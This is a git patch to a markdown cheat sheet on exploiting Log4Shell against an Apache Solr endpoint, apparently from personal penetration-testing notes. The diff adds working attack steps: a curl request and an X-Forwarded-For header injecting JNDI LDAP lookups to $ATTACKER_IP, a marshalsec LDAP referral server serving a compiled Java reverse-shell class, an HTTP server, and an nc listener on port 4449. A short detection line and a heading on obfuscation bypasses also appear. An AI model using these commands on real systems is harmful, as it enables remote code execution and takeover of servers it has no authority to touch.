From 9d24689b42ddc6076a47df47ea5d40ba281ef51a Mon Sep 17 00:00:00 2001
From: whx
Date: Tue, 14 Dec 2021 01:20:25 +0100
Subject: [PATCH] typos
---
 exploit/java/log4shell.md | 33 +++++++++++++++++++--------------
 1 file changed, 19 insertions(+), 14 deletions(-)
diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md
index 1efe6ad..65b8e98 100644
--- a/exploit/java/log4shell.md
+++ b/exploit/java/log4shell.md
@@ -20,23 +20,19 @@ ${java:version}
 ## POC
 ```sh
-curl 'http://:8983/solr/admin/cores?foo=?$\{jndi:ldap://:4449\}'
+curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'
+```
+* Use HTTP header field as storage for payload or any other possible input field
+```HTTP
+X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
 ```
 ## Usage
-* Fuzz endpoints to applicate the exploit
-* Use HTTP header field as storage for payload as well as any other possible input field
-```HTTP
-X-Forwarded-For: ${jndi:ldap://:1389/foo}
-```
-
+* Fuzz endpoints to applicate the exploit on
 * Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests`
 * Java version should be the same as the one on the target
-* Redirect LDAP server to HTTP server
-```sh
-java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
-```
+* A Proxy LDAP server to an HTTP server is needed
 * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
 ```sh
@@ -50,9 +46,18 @@ public class Exploit {
 }
 }
 ```
-* Open reverse shell on `4449`
-* `curl 'http://.10.43.243:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
+* Run the LDAP, HTTP and reverse shell
+```sh
+java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
+```
+```sh
+php -S 0.0.0.:8000
+```
+```sh
+nc -lvnp 4449
+```
+* Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
 ## Detection
@@ -63,7 +68,7 @@ public class Exploit {
 * Parse logs for `jndi`
-## Bypasses
+## Obfuscation
 * Possible bypasses are as follows
 ```sh